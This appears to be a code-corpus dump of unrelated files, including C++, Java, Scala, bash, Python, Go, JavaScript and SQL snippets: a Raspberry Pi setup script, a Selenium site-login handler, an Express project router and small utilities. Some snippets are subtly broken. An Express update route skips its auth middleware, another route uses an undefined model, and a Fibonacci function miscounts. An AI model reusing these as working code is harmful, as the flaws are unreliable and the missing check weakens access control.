wait $kpid1 $kpid2 $kpid3 $kpid4 $kpid5 $kpid6 $kpid7 $kpid8 $kpid9 $kpid10 $kpid11 $kpid12
|
export default {
workspaceSideBarWidth: 0,
selectionRectanglePadding: 6
};
|
<reponame>vany152/FilesHash
#include <boost/filesystem.hpp>
#include <boost/thread.hpp>
#include <fstream>
boost::condition_variable cond;
boost::mutex mut;
#define FNAME ("remove-test")
void remover()
{
while (1)
{
boost::filesystem::remove(FNAME);
}
}
void creater()
{
for (int i = 0; i < 100000; i++)
std::fstream(FNAME, std::fstream::out);
}
int main()
{
boost::filesystem::remove(FNAME);
boost::filesystem::remove(FNAME);
std::cout << "If you got this far, it's OK to remove a file that doesn't exist\n"
"Now trying with one creator thread and two remover threads.\n"
"This is likely to crash after just a few seconds at most."
<< std::endl;
boost::thread c(creater), r1(remover), r2(remover);
c.join();
r1.interrupt();
r1.join();
r2.interrupt();
r2.join();
}
|
<filename>app/src/main/java/com/sereno/Tree.java
package com.sereno;
import java.util.ArrayList;
import java.util.List;
/** @brief Class representing a tree
* A tree is composed of multiple leaves, themselves composed of more leaves*/
public class Tree<T>
{
/** @brief Tree Listener*/
public interface ITreeListener<T>
{
/** @brief Called when a child has been added
* @param parent the parent after the addition
* @param child the child added*/
void onAddChild(Tree<T> parent, Tree<T> child);
/** @brief Called when a child has been removed
* @param parent the parent before removal
* @param child the child removed*/
void onRemoveChild(Tree<T> parent, Tree<T> child);
/** @brief Called when the extendability of a Tree changed
* @param tree the Tree changing
* @param extend the new value of the extendability*/
void onSetExtend(Tree<T> tree, boolean extend);
}
/** @brief The leaves*/
private List<Tree<T>> m_leaves = new ArrayList<>();
/** @brief The stored value*/
public T value = null;
/** @brief The listeners to call when the Tree state changes*/
private List<ITreeListener<T>> m_listeners = new ArrayList<>();
/** @brief The parent Tree*/
private Tree<T> m_parent = null;
/** Should we extend this tree?*/
private boolean m_extend = true;
/** @brief Constructor
* @param v the value bound to this Tree*/
public Tree(T v)
{
value = v;
}
/** @brief Add a new listener
* @param l the new listener*/
public void addListener(ITreeListener<T> l)
{
m_listeners.add(l);
}
/** @brief Remove an old listener
* @param l the listener to remove*/
public void removeListener(ITreeListener<T> l)
{
m_listeners.remove(l);
}
/** @brief Get the parent of this Tree
* @return The parent of the Tree*/
public Tree getParent()
{
return m_parent;
}
/** @brief Get the list of leaves containing the children data
* @return the children list*/
public List<Tree<T>> getChildren()
{
return m_leaves;
}
/** @brief Add a new child to this Tree
* @param child the child to add. If it has already a parent, the parent changes
* @param index the index to put this Tree. Value < 0 signifies that the child will be put at the end of the list*/
public void addChild(Tree<T> child, int index)
{
child.setParent(this, index);
}
/** @brief Remove a child from this Tree
* @param child the child to remove. Done only if child.parent == this*/
public void removeChild(Tree<T> child)
{
if(child.m_parent == this)
{
for(ITreeListener l : m_listeners)
l.onRemoveChild(this, child);
child.m_parent = null;
m_leaves.remove(child);
}
}
/** Should this leaf be extended?
* @return true if should be extended, false otherwise*/
public boolean getExtend()
{
return m_extend;
}
public boolean getExtendInHierarchy()
{
return m_extend && (m_parent == null || m_parent.getExtend());
}
/** Set the extendability of this Leaf
* @param extend true if should be extended, false otherwise*/
public void setExtend(boolean extend)
{
m_extend = extend;
for(ITreeListener l : m_listeners)
l.onSetExtend(this, extend);
}
/** @brief Set the parent of this Tree
* If m_parent != null, we first call remove child
* @param parent the new parent
* @param index the index in the parent children list. Value < 0 signifies that this object will be put at the end of the parent children list*/
public void setParent(Tree<T> parent, int index)
{
if(m_parent != null)
m_parent.removeChild(this);
m_parent = parent;
if(parent != null)
{
if(index < 0)
parent.m_leaves.add(this);
else
parent.m_leaves.add(index, this);
for(ITreeListener<T> l : parent.m_listeners)
l.onAddChild(parent, this);
}
}
@Override
public boolean equals(Object obj)
{
try
{
Tree l = (Tree)obj;
return l.value.equals(this.value) && m_parent == l.m_parent; //Test the equality of the object (equals) and the reference of the parent (same parent)
}
catch(Exception e)
{
return false;
}
}
} |
import { DECK_SELECT } from './index'
/**
* Set redux data when a deck is selected
*
* @param key
* @param deck
*/
export const deckSelect = ({ key, deck }) => ({
type: DECK_SELECT,
key,
deck,
})
|
<gh_stars>0
-- ***************************************************************************
-- File: 2_36.sql
--
-- Developed By TUSC
--
-- Disclaimer: Neither Osborne/McGraw-Hill, TUSC, nor the author warrant
-- that this source code is error-free. If any errors are
-- found in this source code, please report them to TUSC at
-- (630)960-2909 ext 1011 or <EMAIL>.
-- ***************************************************************************
SPOOL 2_36.lis
SELECT TO_DATE('01' || '&&input_date','DDMMYYYY') start_date,
LAST_DAY(ADD_MONTHS(TO_DATE('01' ||
'&&input_date','DDMMYYYY'),2)) end_date
FROM DUAL;
SPOOL OFF
|
package cyclops.function.companion;
import cyclops.async.Future;
import cyclops.container.control.Either;
import cyclops.container.control.Ior;
import cyclops.container.control.Maybe;
import cyclops.container.control.Try;
import cyclops.container.immutable.ImmutableList;
import cyclops.container.immutable.impl.Bag;
import cyclops.container.immutable.impl.BankersQueue;
import cyclops.container.immutable.impl.Chain;
import cyclops.container.immutable.impl.HashSet;
import cyclops.container.immutable.impl.IntMap;
import cyclops.container.immutable.impl.LazySeq;
import cyclops.container.immutable.impl.LazyString;
import cyclops.container.immutable.impl.NonEmptyChain;
import cyclops.container.immutable.impl.NonEmptyList;
import cyclops.container.immutable.impl.Seq;
import cyclops.container.immutable.impl.TreeSet;
import cyclops.container.immutable.impl.TrieSet;
import cyclops.container.immutable.impl.Vector;
import cyclops.container.persistent.PersistentCollection;
import cyclops.function.combiner.Semigroup;
import cyclops.function.combiner.Zippable;
import cyclops.function.higherkinded.NaturalTransformation;
import cyclops.reactive.ReactiveSeq;
import cyclops.reactive.companion.Spouts;
import java.math.BigInteger;
import java.util.Collection;
import java.util.Optional;
import java.util.concurrent.CompletableFuture;
import java.util.function.BiFunction;
import java.util.function.Function;
import java.util.stream.Stream;
import org.reactivestreams.Publisher;
/**
* A static class with a large number of SemigroupK or Combiners.
* <p>
* A semigroup is an Object that can be used to combine objects of the same type.
* <p>
* Using raw Semigroups with container types
* <pre>
* {@code
* Semigroup<Maybe<Integer>> m = Semigroups.combineZippables(Semigroups.intMax);
* Semigroup<ReactiveSeq<Integer>> m = Semigroups.combineZippables(Semigroups.intSum);
* }
* </pre>
*
* @author johnmcclean
*/
public interface Semigroups {
/**
* Combine two Integers by summing them
*/
Semigroup<Integer> intSum = (a, b) -> a + b;
/**
* Combine two Longs by summing them
*/
Semigroup<Long> longSum = (a, b) -> a + b;
/**
* Combine two Doubles by summing them
*/
Semigroup<Double> doubleSum = (a, b) -> a + b;
/**
* Combine two BigIngegers by summing them
*/
Semigroup<BigInteger> bigIntSum = (a, b) -> a.add(b);
/**
* Combine two Integers by multiplying them
*/
Semigroup<Integer> intMult = (a, b) -> a * b;
/**
* Combine two Longs by multiplying them
*/
Semigroup<Long> longMult = (a, b) -> a * b;
/**
* Combine two Doubles by multiplying them
*/
Semigroup<Double> doubleMult = (a, b) -> a * b;
/**
* Combine two BigIntegers by multiplying them
*/
Semigroup<BigInteger> bigIntMult = (a, b) -> a.multiply(b);
/**
* Combine two Integers by selecting the max
*/
Semigroup<Integer> intMax = (a, b) -> b > a ? b : a;
/**
* Combine two Longs by selecting the max
*/
Semigroup<Long> longMax = (a, b) -> b > a ? b : a;
/**
* Combine two Doubles by selecting the max
*/
Semigroup<Double> doubleMax = (a, b) -> b > a ? b : a;
/**
* Combine two BigIntegers by selecting the max
*/
Semigroup<BigInteger> bigIntMax = (a, b) -> a.max(b);
/**
* Combine two Integers by selecting the min
*/
Semigroup<Integer> intMin = (a, b) -> a < b ? a : b;
/**
* Combine two Longs by selecting the min
*/
Semigroup<Long> longMin = (a, b) -> a < b ? a : b;
/**
* Combine two Doubles by selecting the min
*/
Semigroup<Double> doubleMin = (a, b) -> a < b ? a : b;
/**
* Combine two BigIntegers by selecting the min
*/
Semigroup<BigInteger> bigIntMin = (a, b) -> a.min(b);
/**
* String concatenation
*/
Semigroup<String> stringConcat = (a, b) -> a + b;
/**
* StringBuffer concatenation
*/
Semigroup<StringBuffer> stringBufferConcat = (a, b) -> a.append(b);
/**
* StringBuilder concatenation
*/
Semigroup<StringBuilder> stringBuilderConcat = (a, b) -> a.append(b);
/**
* Combine two booleans by OR'ing them (disjunction)
*/
Semigroup<Boolean> booleanDisjunction = (a, b) -> a || b;
/**
* Combine two booleans by XOR'ing them (exclusive disjunction)
*/
Semigroup<Boolean> booleanXDisjunction = (a, b) -> a && !b || b && !a;
/**
* Combine two booleans by AND'ing them (conjunction)
*/
Semigroup<Boolean> booleanConjunction = (a, b) -> a && b;
static <T, C extends PersistentCollection<T>> Semigroup<C> persistentCollectionConcat() {
return (C a, C b) -> (C) a.plusAll(b);
}
static <T, C extends ImmutableList<T>> Semigroup<C> immutableListConcat() {
return (C a, C b) -> (C) a.appendAll(b);
}
static <T> Semigroup<Chain<T>> chainConcat() {
return Semigroups.immutableListConcat();
}
static <T> Semigroup<NonEmptyChain<T>> nonEmptyChainConcat() {
return Semigroups.immutableListConcat();
}
static <T> Semigroup<NonEmptyList<T>> nonEmptyListConcat() {
return Semigroups.immutableListConcat();
}
static <T> Semigroup<LazySeq<T>> lazySeqConcat() {
return Semigroups.immutableListConcat();
}
static <T> Semigroup<Seq<T>> seqConcat() {
return Semigroups.immutableListConcat();
}
static <T> Semigroup<Vector<T>> vectorConcat() {
return Semigroups.persistentCollectionConcat();
}
static <T> Semigroup<IntMap<T>> intMapConcat() {
return Semigroups.persistentCollectionConcat();
}
static <T> Semigroup<HashSet<T>> hashSetConcat() {
return Semigroups.persistentCollectionConcat();
}
static <T> Semigroup<TrieSet<T>> trieSetConcat() {
return Semigroups.persistentCollectionConcat();
}
static <T> Semigroup<TreeSet<T>> treeSetConcat() {
return Semigroups.persistentCollectionConcat();
}
static <T> Semigroup<Bag<T>> bagConcat() {
return Semigroups.persistentCollectionConcat();
}
static <T> Semigroup<BankersQueue<T>> bankersQueueConcat() {
return Semigroups.persistentCollectionConcat();
}
static <T> Semigroup<LazyString> lazyStringConcat() {
return Semigroups.persistentCollectionConcat();
}
/**
* <pre>
* {@code
* BinaryOperator<Seq<Integer>> sumInts = Semigroups.combineZippables(Semigroups.intSum);
*
* sumInts.apply(Seq.of(1,2,3), Seq.of(4,5,6));
*
* //List[5,7,9];
*
* }
* </pre>
*
* @param semigroup Semigroup to combine the values inside the zippables
* @return Combination of two Zippables
*/
static <T, A extends Zippable<T>> Semigroup<A> combineZippables(BiFunction<T, T, T> semigroup) {
return (a, b) -> (A) a.zip(b,
semigroup);
}
/**
* <pre>
* {@code
*
* BinaryOperator<Maybe<Integer>> sumMaybes = Semigroups.combineScalarFunctors(Semigroups.intSum);
* Maybe.just(1)
* .combine(sumMaybes, Maybe.just(5))
*
* //Maybe[6]
* }
* </pre>
*
* @param semigroup Semigroup to combine the values inside the Scalar Functors (Maybe, Xor, Ior, Try, Eva, FeatureToggle etc)
* @return Combination of two Scalar Functors
*/
static <T, A extends Zippable<T>> Semigroup<A> combineScalarFunctors(BiFunction<T, T, T> semigroup) {
return (a, b) -> (A) a.zip(b,
semigroup);
}
/**
* @return Combination of two ReactiveSeq Streams b is appended to a
*/
static <T> Semigroup<ReactiveSeq<T>> combineReactiveSeq() {
return (a, b) -> a.appendStream(b);
}
static <T> Semigroup<ReactiveSeq<T>> firstNonEmptyReactiveSeq() {
return (a, b) -> a.onEmptySwitch(() -> b);
}
static <T> Semigroup<ReactiveSeq<T>> ambReactiveSeq() {
return (a, b) -> (ReactiveSeq<T>) Semigroups.<T>amb().apply(a,
b);
}
static <T> Semigroup<ReactiveSeq<T>> mergeLatestReactiveSeq() {
return (a, b) -> Spouts.mergeLatest(a,
b);
}
static <T> Semigroup<Publisher<T>> mergeLatest() {
return (a, b) -> Spouts.mergeLatest(a,
b);
}
static <T> Semigroup<Publisher<T>> amb() {
return (a, b) -> Spouts.amb(a,
b);
}
static <T> Semigroup<ReactiveSeq<T>> zipReactiveSeq(Semigroup<T> s) {
return (a, b) -> a.zip(s,
b);
}
/**
* @return Combination of two Stream's : b is appended to a
*/
static <T> Semigroup<Stream<T>> combineStream() {
return (a, b) -> Stream.concat(a,
b);
}
/**
* @return Combination of two Collection, first non-zero is returned
*/
static <T, C extends Collection<T>> Semigroup<C> firstNonEmpty() {
return (a, b) -> a.isEmpty() ? b : a;
}
/**
* @return Combination of two Collection, last non-zero is returned
*/
static <T, C extends Collection<T>> Semigroup<C> lastNonEmpty() {
return (a, b) -> b.isEmpty() ? a : b;
}
/**
* @return Combination of two Objects of same type, first non-null is returned
*/
static <T> Semigroup<T> firstNonNull() {
return (a, b) -> a != null ? a : b;
}
/**
* @return Combine two CompletableFuture's by taking the first present
*/
static <T> Semigroup<CompletableFuture<T>> firstCompleteCompletableFuture() {
return (a, b) -> (CompletableFuture<T>) CompletableFuture.anyOf(a,
b);
}
/**
* @return Combine two Future's by taking the first result
*/
static <T> Semigroup<Future<T>> firstCompleteFuture() {
return (a, b) -> Future.anyOf(a,
b);
}
static <T> Semigroup<Future<T>> zippedFutures(Semigroup<T> s) {
return (a, b) -> a.zip(s,
b);
}
/**
* @return Combine two Future's by taking the first successful
*/
static <T> Semigroup<Future<T>> firstSuccessfulFuture() {
return (a, b) -> Future.firstSuccess(a,
b);
}
/**
* @return Combine two Eithers by taking the first right
*/
static <ST, PT> Semigroup<Either<ST, PT>> firstRightEither() {
return (a, b) -> a.isRight() ? a : b;
}
/**
* @return Combine two Eithers by taking the first left
*/
static <ST, PT> Semigroup<Either<ST, PT>> firstLeftEither() {
return (a, b) -> a.isLeft() ? a : b;
}
/**
* @return Combine two Eithers by taking the last right
*/
static <ST, PT> Semigroup<Either<ST, PT>> lastRightEither() {
return (a, b) -> b.isRight() ? b : a;
}
/**
* @return Combine two Eithers by taking the last left
*/
static <ST, PT> Semigroup<Either<ST, PT>> lastLeftEither() {
return (a, b) -> b.isLeft() ? b : a;
}
/**
* @return Combine two Try's by taking the first right
*/
static <T, X extends Throwable> Semigroup<Try<T, X>> firstTrySuccess() {
return (a, b) -> a.isSuccess() ? a : b;
}
/**
* @return Combine two Try's by taking the first left
*/
static <T, X extends Throwable> Semigroup<Try<T, X>> firstTryFailure() {
return (a, b) -> a.isFailure() ? a : b;
}
/**
* @return Combine two Tryr's by taking the last right
*/
static <T, X extends Throwable> Semigroup<Try<T, X>> lastTrySuccess() {
return (a, b) -> b.isSuccess() ? b : a;
}
/**
* @return Combine two Try's by taking the last left
*/
static <T, X extends Throwable> Semigroup<Try<T, X>> lastTryFailure() {
return (a, b) -> b.isFailure() ? b : a;
}
/**
* @return Combine two Ior's by taking the first right
*/
static <ST, PT> Semigroup<Ior<ST, PT>> firstPrimaryIor() {
return (a, b) -> a.isRight() ? a : b;
}
/**
* @return Combine two Ior's by taking the first left
*/
static <ST, PT> Semigroup<Ior<ST, PT>> firstSecondaryIor() {
return (a, b) -> a.isLeft() ? a : b;
}
/**
* @return Combine two Ior's by taking the last right
*/
static <ST, PT> Semigroup<Ior<ST, PT>> lastPrimaryIor() {
return (a, b) -> b.isRight() ? b : a;
}
/**
* @return Combine two Ior's by taking the last left
*/
static <ST, PT> Semigroup<Ior<ST, PT>> lastSecondaryIor() {
return (a, b) -> b.isLeft() ? b : a;
}
/**
* @return Combine two Maybe's by taking the first present
*/
static <T> Semigroup<Maybe<T>> firstPresentMaybe() {
return (a, b) -> a.isPresent() ? a : b;
}
/**
* @return Combine two optionals by taking the first present
*/
static <T> Semigroup<Optional<T>> firstPresentOptional() {
return (a, b) -> a.isPresent() ? a : b;
}
/**
* @return Combine two Maybes by taking the last present
*/
static <T> Semigroup<Maybe<T>> lastPresentMaybe() {
return (a, b) -> b.isPresent() ? b : a;
}
/**
* @return Combine two optionals by taking the last present
*/
static <T> Semigroup<Optional<T>> lastPresentOptional() {
return (a, b) -> b.isPresent() ? b : a;
}
/**
* @param joiner Separator in joined String
* @return Combine two strings separated by the supplied joiner
*/
static Semigroup<String> stringJoin(final String joiner) {
return (a, b) -> a + joiner + b;
}
/**
* @param joiner Separator in joined String
* @return Combine two StringBuilders separated by the supplied joiner
*/
static Semigroup<StringBuilder> stringBuilderJoin(final String joiner) {
return (a, b) -> a.append(joiner)
.append(b);
}
/**
* @param joiner Separator in joined String
* @return Combine two StringBuffers separated by the supplied joiner
*/
static Semigroup<StringBuffer> stringBufferJoin(final String joiner) {
return (a, b) -> a.append(joiner)
.append(b);
}
/**
* @return Combine two Comparables taking the lowest each time
*/
static <T, T2 extends Comparable<T>> Semigroup<T2> minComparable() {
return (a, b) -> a.compareTo((T) b) > 0 ? b : a;
}
/**
* @return Combine two Comparables taking the highest each time
*/
static <T, T2 extends Comparable<T>> Semigroup<T2> maxComparable() {
return (a, b) -> a.compareTo((T) b) > 0 ? a : b;
}
/**
* @return Combine function
*/
static <A> Semigroup<Function<A, A>> functionComposition() {
return (a, b) -> a.andThen(b);
}
static <A> Semigroup<NaturalTransformation<A, A>> naturalTransformationComposition() {
return (a, b) -> a.andThen(b);
}
}
|
package com.peterpotts.gene
case class Codon(
first: Nucleobase,
second: Nucleobase,
third: Nucleobase) {
val toList = List(first, second, third)
}
object RNACodon {
def apply(sequence: String) = Codon(
first = Ribonucleoside(sequence.charAt(0)),
second = Ribonucleoside(sequence.charAt(1)),
third = Ribonucleoside(sequence.charAt(2)))
}
object DNACodon {
def apply(sequence: String) = Codon(
first = Deoxyribonucleoside(sequence.charAt(0)),
second = Deoxyribonucleoside(sequence.charAt(1)),
third = Deoxyribonucleoside(sequence.charAt(2)))
}
|
#!/bin/bash
# check for root
if [ "$EUID" -ne 0 ]
then echo "Please run as root"
exit
fi
RETURN=`pwd`
echo ""
echo "============================="
echo "| Let's update some pkgs |"
echo "============================="
echo ""
# update
apt-get update
apt-get -y upgrade
echo ""
echo "============================="
echo "| Let's install some pkgs |"
echo "============================="
echo ""
# programming
apt-get -y install cmake pkg-config build-essential git swig
# misc
apt-get -y install i2c-tools
# admin
apt-get -y install nmap htop samba samba-common-bin arp-scan wget curl
apt-get -y install wavemon libpcap0.8-dev
# linux kernel
apt-get -y install raspi-config rpi-update
# moved to install-python.sh
# numpy
# need atlas | blas | f2py | fortran
# apt-get -y install libatlas-base-dev gfortran
#
# python3
# apt-get -y install libmpdec2
# apt-get -y install python3
# bluetooth
apt-get -y install bluez libusb-dev libdbus-1-dev libglib2.0-dev libudev-dev libical-dev libreadline-dev
# ascii art
apt-get -y install jp2a figlet
# python package lxml is a BITCH ... it NEVER updates nicely, so you need these
# http://lxml.de/installation.html
apt-get -y install libxml2-dev libxslt-dev python-dev
# node - this ONLY works on RPi 3 (ARMv7) ... it will warn you if ARMv6
./install-node.sh
./install-archeyjs.sh
# python 2/3
#./install-python.sh
# update kernel
rpi-update
# fix permissions
chown -R pi:pi /usr/local
echo ""
echo "============================="
echo "| Done !!! :) |"
echo "| |"
echo "| Rebooting NOW !!!!!!!! |"
echo "============================="
echo ""
reboot now
|
import pygame
pygame.init()
size = (640, 660)
screen = pygame.display.set_mode(size, pygame.DOUBLEBUF)
pygame.display.set_caption("Self-Driving Data Viewer")
def display_data(camera_image, steering_angle):
camera_surface = pygame.surface.Surface((640, 480), 0, 24).convert()
camera_surface.blit(camera_image, (0, 0))
font = pygame.font.Font(None, 36)
text = font.render(f"Steering Angle: {steering_angle}", True, (255, 255, 255))
screen.blit(camera_surface, (0, 0))
screen.blit(text, (10, 500))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
pygame.quit() |
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package gov.nasa.jpl.memex.nutch.protocol.selenium.handlers.login;
import org.apache.nutch.protocol.interactiveselenium.InteractiveSeleniumHandler;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.By;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.support.ui.WebDriverWait;
import org.openqa.selenium.support.ui.ExpectedCondition;
import org.openqa.selenium.JavascriptExecutor;
public class LoginHandler3 implements InteractiveSeleniumHandler {
private static final String USERNAME = "junpengl_usc";
private static final String PASSWORD = "<PASSWORD>";
private static final String PROCESS_URL = "www.theoutdoorstrader.com/members";
public void processDriver(WebDriver driver) {
try {
WebElement element = driver.findElement(By.name("login"));
element.sendKeys(USERNAME);
WebElement password = driver.findElement(By.name("password"));
password.sendKeys(PASSWORD);
WebElement remember = driver.findElement(By.name("remember"));
remember.click();
// Now submit the form. WebDriver will find the form for us from the element
element.submit();
// Check the title of the page
//System.out.println("Page title is: " + driver.getTitle());
// Wait for the page to load, timeout after 10 seconds
(new WebDriverWait(driver, 5)).until(new ExpectedCondition<Boolean>() {
public Boolean apply(WebDriver driver) {
JavascriptExecutor js = (JavascriptExecutor) driver;
return (Boolean)js.executeScript("return jQuery.active == 0");
}
});
//System.out.println("Page title is: " + driver.getTitle());
} catch (Exception e) {
System.out.println(e.toString());
}
}
public boolean shouldProcessURL(String URL) {
if (URL.contains(PROCESS_URL)) {
return true;
}
return false;
}
}
|
<gh_stars>1-10
const router = require("express").Router();
const { Project } = require("../../models");
const withAuth = require("../../utils/auth");
// Create a project
router.post("/", withAuth, async (req, res) => {
try {
const newProject = await Project.create({
...req.body,
user_id: req.session.user_id,
});
res.status(200).json(newProject);
} catch (err) {
res.status(400).json(err);
}
});
router.get("/projects", async (req, res) => {
Project.findAll({
include: [
{
model: User,
attributes: ["name", "email"],
},
],
}).then((data) => res.json(data));
});
// Update a project
router.put('/:id', async (req,res) => {
try {
const projectData = await Project.update(req.body, {
where: {
id: req.params.id,
user_id: req.session.user_id,
},
});
if (!projectData) {
res.status(400).json({message: 'No project found with that id.'});
} else {
res.status(200).json([{message: 'project updated'}, projectData[0]]);
}
} catch (err) {
res.status(400).json(err);
}
});
// Delete a project
router.delete("/:id", withAuth, async (req, res) => {
try {
const projectData = await Project.destroy({
where: {
id: req.params.id,
user_id: req.session.user_id,
},
});
if (!projectData) {
res.status(400).json({ message: "No project found with that id." });
return;
}
res.status(200).json(projectData);
} catch (err) {
res.status(500).json(err);
}
});
module.exports = router;
|
def gen_fib(n):
a = 0
b = 1
if n == 0:
return a
else:
for i in range(2,n):
c = a + b
a = b
b = c
return b |
<reponame>fangfang-zhang/MTGP<gh_stars>0
/*
Copyright 2006 by <NAME>
Licensed under the Academic Free License version 3.0
See the file "LICENSE" for more information
*/
package ec.app.ant;
import ec.app.ant.func.*;
import ec.util.*;
import ec.*;
import ec.gp.*;
import ec.gp.koza.*;
import java.io.*;
import java.util.*;
import ec.simple.*;
/*
* Ant.java
*
* Created: Mon Nov 1 15:46:19 1999
* By: <NAME>
*/
/**
* Ant implements the Artificial Ant problem.
*
<p><b>Parameters</b><br>
<table>
<tr><td valign=top><i>base</i>.<tt>data</tt><br>
<font size=-1>classname, inherits or == ec.gp.GPData</font></td>
<td valign=top>(the class for the prototypical GPData object for the Ant problem)</td></tr>
<tr><td valign=top><i>base</i>.<tt>file</tt><br>
<font size=-1>String</font></td>
<td valign=top>(filename of the .trl file for the Ant problem)</td></tr>
<tr><td valign=top><i>base</i>.<tt>turns</tt><br>
<font size=-1>int >= 1</td>
<td valign=top>(maximal number of moves the ant may make)</td></tr>
</table>
<p><b>Parameter bases</b><br>
<table>
<tr><td valign=top><i>base</i>.<tt>data</tt></td>
<td>species (the GPData object)</td></tr>
</table>
*
* @author <NAME>
* @version 1.0
*/
public class Ant extends GPProblem implements SimpleProblemForm
{
public static final String P_FILE = "file";
public static final String P_MOVES = "moves";
// map point descriptions
public static final int ERROR = 0;
public static final int FOOD = -1;
public static final int EMPTY = 1;
public static final int TRAIL = 2;
public static final int ATE = 3;
// orientations
public static final int O_UP = 0;
public static final int O_LEFT = 1;
public static final int O_DOWN = 2;
public static final int O_RIGHT = 3;
// maximum number of moves
public int maxMoves;
// how much food we have
public int food;
// our map
public int map[][];
// store the positions of food so we can reset our map
// don't need to be deep-cloned, they're read-only
public int foodx[];
public int foody[];
// map[][]'s bounds
public int maxx;
public int maxy;
// our position
public int posx;
public int posy;
// how many points we've gotten
public int sum;
// our orientation
public int orientation;
// how many moves we've made
public int moves;
// print modulo for doing the abcdefg.... thing at print-time
public int pmod;
public Object clone()
{
Ant myobj = (Ant) (super.clone());
myobj.map = new int[map.length][];
for(int x=0;x<map.length;x++)
myobj.map[x] = (int[])(map[x].clone());
return myobj;
}
public void setup(final EvolutionState state,
final Parameter base)
{
// very important, remember this
super.setup(state,base);
// No need to verify the GPData object
// not using any default base -- it's not safe
// how many maxMoves?
maxMoves = state.parameters.getInt(base.push(P_MOVES),null,1);
if (maxMoves==0)
state.output.error("The number of moves an ant has to make must be >0");
// load our file
//File filename = state.parameters.getFile(base.push(P_FILE),null);
//if (filename==null)
// state.output.fatal("Ant trail file name not provided.");
InputStream str = state.parameters.getResource(base.push(P_FILE), null);
if (str == null)
state.output.fatal("Error loading file or resource", base.push(P_FILE), null);
food = 0;
LineNumberReader lnr = null;
try
{
lnr =
//new LineNumberReader(new FileReader(filename));
new LineNumberReader(new InputStreamReader(str));
StringTokenizer st = new StringTokenizer(lnr.readLine()); // ugh
maxx = Integer.parseInt(st.nextToken());
maxy = Integer.parseInt(st.nextToken());
map = new int[maxx][maxy];
int y;
for(y=0;y<maxy;y++)
{
String s = lnr.readLine();
if (s==null)
{
state.output.warning("Ant trail file ended prematurely");
break;
}
int x;
for(x=0;x<s.length();x++)
{
if (s.charAt(x)==' ')
map[x][y]=EMPTY;
else if (s.charAt(x)=='#')
{ map[x][y]=FOOD; food++; }
else if (s.charAt(x)=='.')
map[x][y]=TRAIL;
else state.output.error("Bad character '" + s.charAt(x) + "' on line number " + lnr.getLineNumber() + " of the Ant trail file.");
}
// fill out rest of X's
for(int z=x;z<maxx;z++)
map[z][y]=EMPTY;
}
// fill out rest of Y's
for (int z=y;z<maxy;z++)
for(int x=0;x<maxx;x++)
map[x][z]=EMPTY;
}
catch (NumberFormatException e)
{
state.output.fatal("The Ant trail file does not begin with x and y integer values.");
}
catch (IOException e)
{
state.output.fatal("The Ant trail file could not be read due to an IOException:\n" + e);
}
finally
{
try { if (lnr != null) lnr.close(); } catch (IOException e) { }
}
state.output.exitIfErrors();
// load foodx and foody reset arrays
foodx = new int[food];
foody = new int[food];
int tmpf = 0;
for(int x=0;x<map.length;x++)
for(int y=0;y<map[0].length;y++)
if (map[x][y]==FOOD)
{ foodx[tmpf] = x; foody[tmpf] = y; tmpf++; }
}
public void evaluate(final EvolutionState state,
final Individual ind,
final int subpopulation,
final int threadnum)
{
if (!ind.evaluated) // don't bother reevaluating
{
sum = 0;
posx = 0;
posy = 0;
orientation = O_RIGHT;
for(moves=0;moves<maxMoves && sum<food; )
((GPIndividual)ind).trees[0].child.eval(
state,threadnum,input,stack,((GPIndividual)ind),this);
// the fitness better be KozaFitness!
KozaFitness f = ((KozaFitness)ind.fitness);
f.setStandardizedFitness(state,(food - sum));
f.hits = sum;
ind.evaluated = true;
// clean up array
for(int y=0;y<food;y++)
map[foodx[y]][foody[y]] = FOOD;
}
}
public void describe(
final EvolutionState state,
final Individual ind,
final int subpopulation,
final int threadnum,
final int log)
{
state.output.println("\n\nBest Individual's Map\n=====================", log);
sum = 0;
pmod = 97; /** ascii a */
posx = 0;
posy = 0;
orientation = O_RIGHT;
int[][] map2 = new int[map.length][];
for(int x=0;x<map.length;x++)
map2[x] = (int[])(map[x].clone());
map2[posx][posy] = pmod; pmod++;
for(moves=0; moves<maxMoves && sum<food; )
((EvalPrint)(((GPIndividual)ind).trees[0].child)).evalPrint(
state,threadnum,input,stack,((GPIndividual)ind),this,
map2);
// print out the map
for(int y=0;y<map2.length;y++)
{
for(int x=0;x<map2.length;x++)
{
switch(map2[x][y])
{
case FOOD:
state.output.print("#",log);
break;
case EMPTY:
state.output.print(".",log);
break;
case TRAIL:
state.output.print("+",log);
break;
case ATE:
state.output.print("?",log);
break;
default:
state.output.print(""+((char)map2[x][y]),log);
break;
}
}
state.output.println("",log);
}
}
@Override
public void normObjective(EvolutionState state, Individual ind, int subpopulation, int threadnum) {
// TODO Auto-generated method stub
}
}
|
package pearson_test
import (
"bytes"
"encoding/binary"
"hash"
"io"
"math/rand"
"testing"
"github.com/nfisher/gstream/hash/pearson"
)
func Test_sum(t *testing.T) {
td := map[string]struct {
hash.Hash64
in string
out uint64
}{
"string input": {h(), "Hello world!!!", binary.LittleEndian.Uint64([]byte{85, 241, 106, 61, 154, 39, 190, 155})},
"empty input": {h(), "", binary.LittleEndian.Uint64([]byte{0, 0, 0, 0, 0, 0, 0, 0})},
}
for n, tt := range td {
t.Run(n, func(t *testing.T) {
io.Copy(tt, bytes.NewBufferString(tt.in))
sum := tt.Sum64()
if sum != tt.out {
t.Errorf("got sum = %v, want %v", sum, tt.out)
}
})
}
}
func h() hash.Hash64 {
rand.Seed(12345)
return pearson.New64()
}
|
def maxmin(arr):
max = arr[0]
min = arr[0]
for num in arr:
if num > max:
max = num
if num < min:
min = num
return max, min
arr = [1, 8, 5, 4, 10, 9]
max_val, min_val = maxmin(arr)
print("Maximum value:", max_val)
print("Minimum value:", min_val) |
<reponame>TheShahriyar/revson-gatsby
import React from "react"
import Img9 from "../images/others/img-9.jpg"
